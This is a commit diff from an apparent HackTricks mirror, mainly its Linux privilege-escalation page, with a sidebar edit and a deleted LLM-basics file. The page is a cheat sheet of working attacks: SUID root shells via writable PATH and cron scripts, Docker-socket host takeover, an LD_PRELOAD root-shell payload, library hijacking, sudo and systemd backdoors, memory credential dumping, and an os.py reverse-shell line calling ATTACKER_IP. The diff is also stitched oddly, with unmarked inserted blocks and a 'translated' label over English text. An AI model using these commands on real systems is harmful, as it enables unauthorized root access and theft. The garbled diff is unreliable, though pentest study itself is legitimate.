Mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00

Commit c28d8c2172 (parent 53173d44b2): Translated ['src/linux-hardening/privilege-escalation/README.md'] to af
@@ -793,6 +793,29 @@
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)

# 🤖 AI

- [AI Security](AI/README.md)
- [AI Security Methodology](AI/AI-Deep-Learning.md)
- [AI MCP Security](AI/AI-MCP-Servers.md)
- [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
- [AI Models RCE](AI/AI-Models-RCE.md)
- [AI Prompts](AI/AI-Prompts.md)
- [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
- [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
- [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
- [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
- [LLM Training](AI/AI-llm-architecture/README.md)
- [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
- [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
- [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
- [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
- [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
- [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
- [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
- [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
- [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
- [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)

# 🔩 Reversing

- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
@@ -850,17 +873,6 @@
- [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
- [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
- [Test LLMs](todo/test-llms.md)
- [LLM Training](todo/llm-training-data-preparation/README.md)
- [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
- [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
- [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
- [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
- [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
- [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
- [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
- [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
- [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
- [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
- [Burp Suite](todo/burp-suite.md)
- [Other Web Tricks](todo/other-web-tricks.md)
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
@@ -14,7 +14,7 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
```
### Path

If you have **write permissions on any folder inside the `PATH`** variable you may be able to hijack some libraries or binaries:
```bash
echo $PATH
```
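For instance, a minimal sketch of abusing a writable `PATH` directory (the directory name, the spoofed command `ps` and the privileged caller are assumptions for illustration):
```bash
# Assumption: /home/user/bin is writable and listed before /usr/bin in $PATH,
# and some privileged script later invokes `ps` without an absolute path.
cat > /home/user/bin/ps <<'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash   # plant a SUID shell
exec /usr/bin/ps "$@"                                   # keep the expected output
EOF
chmod +x /home/user/bin/ps
# After the privileged process runs `ps`, spawn the root shell with: /tmp/rootbash -p
```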
@@ -26,26 +26,26 @@ Interesting information, passwords or API keys in the environment variables?
```
### Kernel exploits

Check the kernel version and whether there is some exploit that can be used to escalate privileges
```bash
cat /proc/version
uname -a
searchsploit "Linux Kernel"
```
You can find a good list of vulnerable kernels and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)

To extract all the vulnerable kernel versions from that web you can do:
```bash
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
```
Tools that could help to search for kernel exploits are:

[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim, only checks exploits for kernel 2.x)

Always **search the kernel version in Google**, maybe your kernel version is mentioned in some kernel exploit and then you will be sure this exploit is valid.

### CVE-2016-5195 (DirtyCow)

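If the host has outbound access, a quick sketch of running one of the suggester scripts listed above (the download path is the usual raw GitHub location for that repo; verify it, or transfer the script another way):
```bash
# Fetch and run linux-exploit-suggester, then compare its suggestions with `uname -a`.
curl -sL https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -o /tmp/les.sh
chmod +x /tmp/les.sh
/tmp/les.sh 2>/dev/null
```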
@@ -75,7 +75,7 @@ sudo -u#-1 /bin/bash
```
### Dmesg signature verification failed

Check the **smasher2 box of HTB** for an **example** of how this vulnerability could be exploited
```bash
dmesg 2>/dev/null | grep "signature"
```
@@ -140,25 +140,25 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
```
## Useful software

Enumerate useful binaries
```bash
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
```
Also check if **any compiler is installed**. This is useful if you need to use some kernel exploit, as it's recommended to compile it on the machine where you are going to use it (or on a similar one).
```bash
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
```
### Vulnerable Software Installed

Check the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited to escalate privileges…\
It is recommended to check manually the version of the more suspicious installed software.
```bash
dpkg -l #Debian
rpm -qa #Centos
```
If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine.

> [!NOTE] > _Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended to use applications like OpenVAS or similar that can check whether any installed software version is vulnerable to known exploits_

## Processes

@@ -230,7 +230,7 @@ rm $1*.bin
```
#### /dev/mem

`/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernel's virtual address space can be accessed using /dev/kmem.\
Typically, `/dev/mem` is only readable by **root** and the **kmem** group.
```
strings /dev/mem -n10 | grep -i PASS
@@ -269,7 +269,7 @@ Press Ctrl-C to end monitoring without terminating the process.
To dump a process memory you could use:

- [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_You can manually remove the root requirement and dump a process owned by you
- Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required)

### Credentials from Process Memory
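If `gdb` happens to be installed, a minimal sketch of dumping a process you own with `gcore` (the target process name is only a hypothetical example):
```bash
# gcore ships with gdb and writes a core file named <output>.<pid>
PID=$(pgrep -u "$(whoami)" -n -x gpg-agent)   # hypothetical target owned by the current user
gcore -o /tmp/proc_dump "$PID"
strings "/tmp/proc_dump.$PID" | grep -iE 'pass|secret|token' | head
```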
@@ -288,15 +288,15 @@ strings *.dump | grep -i password
```
#### mimipenguin

The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly.

| Feature                                           | Process Name         |
| ------------------------------------------------- | -------------------- |
| GDM password (Kali Desktop, Debian Desktop)       | gdm-password         |
| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
| LightDM (Ubuntu Desktop)                          | lightdm              |
| VSFTPd (Active FTP Connections)                   | vsftpd               |
| Apache2 (Active HTTP Basic Auth Sessions)         | apache2              |
| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                |

#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
@@ -327,7 +327,7 @@ For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr

(_Note how the user "user" has write privileges over /home/user_)

If the root user in this crontab tries to execute some command or script without setting the path, for example: _\* \* \* \* root overwrite.sh_\
Then you can get a root shell by using:
```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
@@ -356,15 +356,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p
```
If the script executed by root uses a **directory where you have full access**, it might be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you
```bash
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
```
### Frequent cron jobs

You can monitor the processes to search for ones that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of that and escalate privileges (see also the pspy sketch below).

For example, to **monitor every 0.1s during 1 minute**, **sort by the least executed commands** and delete the commands that have been executed the most, you can do:
```bash
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
```
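Alternatively, a process snooper like [pspy](https://github.com/DominicBreuker/pspy) shows cron-spawned commands without root; a sketch assuming you can drop the `pspy64` binary on the host:
```bash
# -p prints executed commands, -f also prints file-system events,
# -i sets the polling interval in milliseconds.
chmod +x ./pspy64
./pspy64 -pf -i 1000
```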
@@ -419,18 +419,18 @@ Unit=backdoor.service
```
In the documentation you can read what the Unit is:

> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.

Therefore, to abuse this permission you would need to:

- Find some systemd unit (like a `.service`) that is **executing a writable binary**
- Find some systemd unit that is **executing a relative path** and you have **write privileges** over the **systemd PATH** (to impersonate that executable)

**Learn more about timers with `man systemd.timer`.**

### **Timer Activation**

To activate a timer you need root privileges and to execute:
```bash
sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
@@ -445,7 +445,7 @@ Sockets can be configured using `.socket` files.

**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured:

- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different, but a summary is used to **indicate where it is going to listen** for the socket (the path of the AF_UNIX socket file, the IPv4/6 address and/or port number to listen on, etc.)
- `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`.
- `ExecStartPre`, `ExecStartPost`: Take one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, followed by arguments for the process.
- `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
@@ -458,7 +458,7 @@ _Note that the system must be using that socket file configuration or the back

### Writable sockets

If you **identify any writable socket** (_we are now talking about Unix sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability.
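For instance, a minimal sketch of poking a writable Unix socket once you find one (the socket path and payload are placeholders; use a path discovered with the enumeration below):
```bash
SOCK=/run/example-daemon.sock          # hypothetical writable socket
# With OpenBSD netcat (supports -U for Unix sockets):
echo 'STATUS' | nc -U "$SOCK" -q 2
# Or with socat, which is often available:
echo 'STATUS' | socat - UNIX-CONNECT:"$SOCK"
```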

### Enumerate Unix Sockets
```bash
@@ -485,24 +485,24 @@ Note that there may be some **sockets listening for HTTP** requests (_I'm not
```bash
curl --max-time 2 --unix-socket /path/to/socket/file http:/index
```
If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.

### Writable Docker Socket

The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it is writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available.

#### **Privilege Escalation with Docker CLI**

If you have write access to the Docker socket, you can escalate privileges using the following commands:
```bash
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
These commands allow you to run a container with root-level access to the host's file system.

#### **Using the Docker API Directly**

In cases where the Docker CLI isn't available, the Docker socket can still be manipulated using the Docker API and `curl` commands.

1. **List Docker Images:** Retrieve the list of available images.

@@ -536,7 +536,7 @@ After setting up the `socat` connection, you can execute commands directly in the container

### Others

Note that if you have write permissions over the docker socket because you are **inside the group `docker`**, you have [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening on a port** you can also compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).

Check **more ways to break out from docker or abuse it to escalate privileges** in:

@@ -564,11 +564,11 @@ runc-privilege-escalation.md

D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to interact and share data efficiently. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication.

The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it helps broadcast events or signals, fostering seamless integration among system components. For example, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, improving the user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex.

D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. These policies specify interactions with the bus, potentially allowing privilege escalation through the exploitation of these permissions.

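To get a quick picture of what is exposed on the system bus before digging into the policies, a sketch using `busctl` (the `org.freedesktop.login1` name is just a common example target):
```bash
busctl list                                   # well-known names on the system bus
busctl status org.freedesktop.login1          # owning PID/UID of a given name
busctl tree org.freedesktop.login1            # exported object paths
busctl introspect org.freedesktop.login1 /org/freedesktop/login1   # methods, properties, signals
```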
An example of such a policy in `/etc/dbus-1/system.d/wpa_supplicant.conf` is provided, detailing permissions for the root user to own, send to, and receive messages from `fi.w1.wpa_supplicant1`.

Policies without a specified user or group apply universally, while "default" context policies apply to everyone not covered by other specific policies.
```xml
@@ -612,7 +612,7 @@ cat /etc/networks
#Files used by network services
lsof -i
```
### Open ports

Always check network services running on the machine that you weren't able to interact with before accessing it:
```bash
@@ -694,11 +694,11 @@ If you don't mind making a lot of noise and the `su` and `timeout` binaries are present on the

### $PATH

If you find that you can **write inside some folder of the $PATH**, you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (ideally root) and that is **not loaded from a folder located before** your writable folder in $PATH.

### SUDO and SUID

You could be allowed to execute some command using sudo, or they could have the suid bit set. Check it using:
```bash
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries
@@ -726,7 +726,7 @@ sudo vim -c '!sh'
```
### SETENV

This directive allows the user to **set an environment variable** while executing something:
```bash
$ sudo -l
User waldo may run the following commands on admirer:
@@ -769,9 +769,9 @@ This technique can also be used if a **suid** binary **executes another command

### SUID binary with command path

If the **suid** binary **executes another command specifying the path**, then you can try to **export a function** named like the command that the suid file is calling.

For example, if a suid binary calls _**/usr/sbin/service apache2 start**_, you have to try to create the function and export it:
```bash
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
@@ -780,12 +780,12 @@ Then, when you call the suid binary, this function will be executed

### LD_PRELOAD & **LD_LIBRARY_PATH**

The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library.

However, to maintain system security and prevent this feature from being exploited, particularly with **suid/sgid** executables, the system enforces certain conditions:

- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_).
- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges.
```
@@ -809,7 +809,7 @@ Then **compile it** using:
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
```
Finally, **escalate privileges** running
```bash
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
```
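The `pe.c` payload referenced by the compile step is not shown in this hunk; a minimal sketch matching the `-nostartfiles` flag (an `_init` constructor that clears the variable and spawns a root shell) could look like this:
```bash
# Write a typical LD_PRELOAD payload and build it exactly as above (a sketch).
cat > /tmp/pe.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");   // avoid re-triggering in child processes
    setgid(0);
    setuid(0);                // works because the sudo'd process runs as root
    system("/bin/bash -p");
}
EOF
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
```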
@@ -836,7 +836,7 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
```
### SUID Binary – .so injection

When you come across a binary with **SUID** permissions that seems unusual, it's a good practice to verify whether it's loading **.so** files properly. This can be checked by running the following command:
```bash
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
```
@@ -859,7 +859,7 @@ Compile the above C file into a shared object (.so) file with:
```bash
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
```
Finally, running the affected SUID binary should trigger the exploit, allowing for potential system compromise.

## Shared Object Hijacking
```bash
@@ -871,7 +871,7 @@ something.so => /lib/x86_64-linux-gnu/something.so
readelf -d payroll | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]
```
Now that we have found a SUID binary loading a library from a folder where we can write, let's create the library in that folder with the necessary name:
```c
//gcc src.c -fPIC -shared -o /development/libshared.so
#include <stdio.h>
@@ -894,7 +894,7 @@ this means that the library you have generated needs to have a function called `a_

[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same, but for cases where you can **only inject arguments** into a command.

The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.

> gdb -nx -ex '!sh' -ex quit\
> sudo mysql -e '! /bin/sh'\
@@ -939,7 +939,7 @@ sudo su
bash exploit_v2.sh
/tmp/sh -p
```
- The **third exploit** (`exploit_v3.sh`) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo**
```bash
bash exploit_v3.sh
sudo su
@@ -979,9 +979,9 @@ permit nopass demo as root cmd vim
```
### Sudo Hijacking

If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user's context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash_profile) so when the user executes sudo, your sudo executable is executed.

Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)

Or running something like:
```bash
@@ -1049,7 +1049,7 @@ execve(file,argv,0);
## Capabilities

Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\
Read the following page to **learn more about capabilities and how to abuse them**:
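A quick way to spot capability-based escalation paths before reading that page is to list file capabilities (a sketch; something like `cap_setuid+ep` on an interpreter binary is usually an easy win):
```bash
getcap -r / 2>/dev/null
```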

{{#ref}}
linux-capabilities.md
@@ -1058,13 +1058,13 @@ linux-capabilities.md

## Directory permissions

In a directory, the **bit for "execute"** implies that the affected user can "**cd**" into the folder.\
The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**.

## ACLs

Access Control Lists (ACLs) represent the secondary layer of discretionary permissions, capable of **overriding the traditional ugo/rwx permissions**. These permissions enhance control over file or directory access by allowing or denying rights to specific users who are not the owners or part of the group. This level of **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).
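To hunt for files that carry ACLs (they only show up in a normal `ls -l` as a trailing `+`), a sketch:
```bash
# List every path that has ACL entries beyond the base ugo/rwx set (can be slow on /).
getfacl -R -s -p / 2>/dev/null | grep "^# file:"
```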

**Give** user "kali" read and write permissions over a file:
```bash
setfacl -m u:kali:rw file.txt
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
@@ -1139,19 +1139,19 @@ Specifies whether root can log in using ssh; the default is `no`. Possible values:
- `yes`: root can log in using password and private key
- `without-password` or `prohibit-password`: root can only log in with a private key
- `forced-commands-only`: root can log in only using a private key and if the command options are specified
- `no`: no

### AuthorizedKeysFile

Specifies the files that contain the public keys that can be used for user authentication. It can contain tokens like `%h`, which will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example:
```bash
AuthorizedKeysFile .ssh/authorized_keys access
```
This configuration will indicate that if you try to log in with the **private** key of the user "**testusername**", ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access`.

### ForwardAgent/AllowAgentForwarding

SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located on your **initial host**.

You need to set this option in `$HOME/.ssh.config` like this:
```
@@ -1163,7 +1163,7 @@ Note that if `Host` is `*`, every time the user jumps to a different machine

The file `/etc/ssh_config` can **override** these **options** and allow or deny this configuration.\
The file `/etc/sshd_config` can **allow** or **deny** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow).

If you find that Forward Agent is configured in an environment, read the following page as **you may be able to abuse it to escalate privileges**:

{{#ref}}
ssh-forward-agent-exploitation.md
@@ -1181,7 +1181,7 @@ If any weird profile script is found, you should check it for **sensitive details**

### Passwd/Shadow Files

Depending on the OS, the `/etc/passwd` and `/etc/shadow` files may use a different name or there may be a backup. Therefore it's recommended to **find all of them** and **check if you can read them** to see **if there are hashes** inside the files:
```bash
#Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
@@ -1227,7 +1227,7 @@ ExecStart=/path/to/backdoor
User=root
Group=root
```
Your backdoor will be executed the next time tomcat is started.
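To hunt for unit files you could tamper with in this way, a sketch (the searched paths are the common distro defaults; adjust as needed):
```bash
# Writable .service files (or writable directories holding them) run by root are a
# common escalation path worth checking.
find /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system \
     -writable \( -name "*.service" -o -type d \) 2>/dev/null
```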

### Check Folders

@@ -1292,14 +1292,14 @@ Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalat
### Logs

If you can read logs, you may be able to find **interesting/confidential information inside them**. The stranger the log is, the more interesting it will be (probably).\
Also, some "**badly**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
```bash
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
```
To **read logs, the group** [**adm**](interesting-groups-linux-pe/index.html#adm-group) will be really helpful.

### Shell files
```bash
~/.bash_profile # if it exists, read it once when you log in to the shell
~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
@@ -1313,13 +1313,13 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/index.h
### Generic Credentials Search/Regex

You should also check for files containing the word "**password**" in their **name** or inside their **content**, and also check for IPs and emails inside logs, or hash regexps.\
I'm not going to list here how to do all of this, but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) performs.
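For example, a quick manual pass could look like the following sketch (the paths and patterns are assumptions to tune per target):
```bash
# Files whose name contains "password" (case-insensitive)
find / -type f -iname "*password*" 2>/dev/null | head -n 20

# Grep likely config locations for the word "password" (noisy; adjust paths)
grep -RiIl "password" /etc /var/www /home /opt 2>/dev/null | head -n 20

# Rough regexes for emails and IPv4 addresses inside logs
grep -RhoE "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+" /var/log 2>/dev/null | sort -u | head
grep -RhoE "([0-9]{1,3}\.){3}[0-9]{1,3}" /var/log 2>/dev/null | sort -u | head
```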
## Writable files
### Python library hijacking

If you know **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where the python script is going to be executed, copy and paste the os.py library).
To **backdoor the library**, just add the following line at the end of the os.py library (change the IP and PORT):

@@ -1329,7 +1329,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
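As a sketch, the appended line is typically a reverse-shell one-liner of this shape, where `ATTACKER_IP` and the port are placeholders rather than values taken from this page:
```python
# Appended at the end of os.py: executes whenever the library is imported
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```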
A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, which often runs as **root**, can be manipulated into executing arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It is important to check permissions not only in _/var/log_ but also in any directory where log rotation is applied.

> [!TIP]
> This vulnerability affects `logrotate` version `3.18.0` and older

More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
@@ -1346,7 +1346,7 @@ If, for whatever reason, a user is able to **write** an `ifcf-<whatever>` s
Network scripts, _ifcfg-eth0_ for example, are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d).

In my case, the `NAME=` attribute in these network scripts is not handled correctly. If you have **white/blank space in the name, the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**.

For example: _/etc/sysconfig/network-scripts/ifcfg-1337_
@@ -1389,7 +1389,7 @@ cisco-vmanage.md
## More help

[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)

## Linux/Unix Privesc Tools
@@ -1,285 +0,0 @@
# 0. Basic LLM Concepts

## Pretraining

Pretraining is the foundational phase in developing a large language model (LLM), where the model is exposed to vast and diverse amounts of text data. During this phase, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of language and general world knowledge. This comprehensive base enables the LLM to generate coherent and contextually relevant text. Afterwards, this pretrained model can be fine-tuned, i.e. further trained on specialized datasets to adapt its capabilities to specific tasks or domains, improving its performance and relevance in targeted applications.

## Main LLM components

Usually an LLM is characterised by the configuration used to train it. These are the common components when training an LLM:

- **Parameters**: Parameters are the **learnable weights and biases** in the neural network. These are the numbers that the training process adjusts to minimise the loss function and improve the model's performance on the task. LLMs usually use millions to billions of parameters.
- **Context length**: The maximum length of each sequence used to pre-train the LLM.
